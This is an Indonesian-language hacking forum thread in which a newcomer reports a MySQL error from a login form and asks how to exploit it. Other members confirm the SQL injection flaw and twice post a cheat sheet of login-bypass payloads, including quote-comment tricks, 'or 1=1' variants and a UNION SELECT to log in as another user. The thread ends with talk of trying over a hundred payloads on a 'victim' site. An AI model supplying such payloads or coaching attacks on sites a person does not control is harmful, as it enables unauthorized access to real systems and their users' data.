Pesen Om PONI

[RJ-45]

Karena disuruh om poni suruh nanyain diforum makanya saya tanyakan disin saja kakak2 yang baik hati tidak sombong dan rajin menabung......

numpang tanya kakak...
kalau pada form loginnya kita isikan ' pada username n password kosong kok muncul pesan error begini ya??

Code: Select all

Error !!!


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

itu memungkinkan buat di inject g kakak? lo bisa caranya gmana??
mohon maaf lo banyak tanya,

[poni]

itu bug sqli. bisa di inject. tutor sqli kan banyak di forum..

[RJ-45]

hehehe...
pi ku bingung mas lo nginjectnya lewat form....
maklum newbie banget.....
:maaf: :maaf: :maaf: :maaf: :maaf: :maaf: :maaf:

[Darkzzzz]

Lah kan bang poni udah bikin tutor Havij & Sql Helper...
Dicoba aja...

[RJ-45]

Lo pake tool malah mebingunkan kakak, wong yang mau di inject tu form loginnya......

[Darkzzzz]

Owh....
SQL Injection 101, Login tricks

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

* Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

*Old versions of MySQL doesn't support union queries
Sumber : http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
Referensi : http://www.securiteam.com/securityreviews/5DP0N1P76E.html

[b0c4h]

Owh....
SQL Injection 101, Login tricks

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

* Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

*Old versions of MySQL doesn't support union queries
Sumber : http://ferruh.mavituna.com/sql-injectio ... sheet-oku/
Referensi : http://www.securiteam.com/securityrevie ... 1P76E.html

mw nambahin atu ya omz darkzzzz....
bs jg pk : 'having 1=1--

.thx.

[RJ-45]

hahahaha udah aku coba yang itu om.. dah aku coba pake add onnya mozilla ada 100 an lebih malahan tu.. tetep nihil...

[b0c4h]

hahahaha udah aku coba yang itu om.. dah aku coba pake add onnya mozilla ada 100 an lebih malahan tu.. tetep nihil...

ahhh,,,ms sih kk....kmrn sy ga nympe 100 koq...tp msh da j web yg vuln pk teknik ky gtu....
kmrn sy yg pk 'having 1=1-- sm bypass login 'or 1=1-- ......
yg sabar j kk....jika saat'a tiba, pasti akan datang juga....(haalaaaahhhh....bahasa uoopoooo kuiii....kbanyakan nonton sinetron ki....wkwkwkkwkw......)

.thx.

[RJ-45]

heheh coz korbannya cuma satu....
lo 100 korban past ada yang bisa.. hehehehe